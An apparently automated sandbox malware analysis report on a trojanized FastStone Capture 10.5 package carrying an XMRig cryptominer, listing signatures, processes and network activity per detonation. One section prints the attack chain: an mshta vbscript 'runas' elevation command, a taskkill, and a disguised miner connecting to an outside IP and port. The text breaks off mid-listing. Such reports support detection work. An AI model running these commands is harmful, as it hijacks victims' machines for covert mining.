Malware Analysis Report

2025-06-16 06:55

Sample ID 241104-fd1jjatjay
Target 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8
SHA256 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8
Tags
discovery xmrig defense_evasion miner privilege_escalation evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8

Threat Level: Known bad

The file 842e2bcd8f9cc4479d129b390fc81b3a9c8d0921b907fd0ba10ff802835b66d8 was found to be: Known bad.

Malicious Activity Summary

discovery xmrig defense_evasion miner privilege_escalation evasion trojan

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Checks computer location settings

Checks whether UAC is enabled

Program crash

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

Browser Information Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Suspicious use of FindShellTrayWindow

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 04:46

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Network

N/A

Files

memory/1144-1-0x0000000000C30000-0x0000000000DCC000-memory.dmp

memory/1144-0-0x0000000000190000-0x0000000000191000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin04.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4788-0-0x0000000003190000-0x0000000003191000-memory.dmp

memory/4788-1-0x0000000000920000-0x0000000000ABC000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20241010-en

Max time kernel

12s

Max time network

19s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\CLSID = "{7D24573C-DB27-3694-BEC3-4263D335A781}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\ = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\FSCapture-10.5-CN\\bin\\FSCPlugin05.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FriendlyName = "FastStoneVirtualAudio" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\Instance\{7D24573C-DB27-3694-BEC3-4263D335A781}\FilterData = 02000000000020000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000006175647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D24573C-DB27-3694-BEC3-4263D335A781}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1996 wrote to memory of 1856 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin05.dll

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Network

N/A

Files

memory/2532-0-0x0000000000170000-0x0000000000171000-memory.dmp

memory/2532-1-0x0000000000DA0000-0x0000000001330000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:49

Platform

win7-20240903-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSCPlugin03.exe"

Network

N/A

Files

memory/2960-0-0x0000000000240000-0x0000000000241000-memory.dmp

memory/2960-1-0x0000000001050000-0x0000000001286000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Network

N/A

Files

memory/1880-1-0x0000000000400000-0x00000000004A3000-memory.dmp

memory/1880-0-0x00000000001C0000-0x00000000001C1000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSFocus.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1940-0-0x0000000002260000-0x0000000002261000-memory.dmp

memory/1940-1-0x0000000000400000-0x00000000004A3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe

"C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\FSRecorder.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/3676-0-0x0000000001780000-0x0000000001781000-memory.dmp

memory/3676-1-0x0000000000E10000-0x00000000013A0000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win7-20240903-en

Max time kernel

147s

Max time network

155s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\CrashReporting.bat"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT","goto :target","","runas",1)(window.close)

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\CRASHR~1.BAT" goto :target

C:\Windows\system32\taskkill.exe

taskkill /f /t /im FSCapture_license.exe

C:\Users\Admin\AppData\Local\Temp\FSCAPT~1.5-C\bin\re\lib\FSCapture_license.exe

FSCapture_license.exe -o 104.168.101.23:34512 -t 7 -B -k

Network

Country Destination Domain Proto
US 104.168.101.23:34512 tcp

Files

memory/2772-1-0x00000000002F0000-0x0000000000310000-memory.dmp

memory/2772-2-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-3-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-4-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-5-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-6-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-7-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-8-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-9-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-10-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-11-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-12-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-13-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-14-0x0000000000400000-0x0000000000E80000-memory.dmp

memory/2772-15-0x0000000000400000-0x0000000000E80000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

140s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\re\lib\WinRing0x64.sys

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

memory/3532-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2008 wrote to memory of 764 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libsharpyuv.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 764 -ip 764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-04 04:46

Reported

2024-11-04 04:50

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4384 wrote to memory of 2040 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FSCapture-10.5-CN\bin\libwebp.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2040 -ip 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 604

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
